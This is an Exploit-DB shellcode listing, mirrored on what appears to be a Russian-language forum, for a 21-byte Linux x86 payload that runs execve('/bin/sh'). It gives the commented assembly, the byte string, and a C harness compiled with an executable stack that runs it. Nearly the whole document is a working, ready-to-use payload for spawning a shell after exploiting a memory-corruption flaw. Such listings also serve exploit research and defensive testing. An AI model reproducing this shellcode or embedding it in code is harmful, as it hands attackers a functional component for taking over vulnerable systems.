- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36857
- Проверка EDB
-
- Пройдено
- Автор
- NOVICEFLUX
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2015-04-29
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)
C:
/*
#
# Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong ([email protected])
#
# 18 February 2015
#
# GPL
#
.global _start
_start:
# char *const argv[]
xorl %ecx, %ecx
# 2 bytes, and both %eax and %edx were zeroed
mull %ecx
# __NR_execve 11
movb $11, %al
# for '\x00'
pushl %ecx
# 'h' 's' '/' '/'
pushl $0x68732f2f
# 'n' 'i' 'b' '/'
pushl $0x6e69622f
# const char *filename
movl %esp, %ebx
int $0x80
*/
/*
gcc -z execstack -m32 push.c
uname -r
3.19.3-3-ARCH
*/
#include <stdio.h>
#include <string.h>
int
main(void)
{
char *shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
printf("strlen(shellcode)=%d\n", strlen(shellcode));
((void (*)(void))shellcode)();
return 0;
}- Источник
- www.exploit-db.com
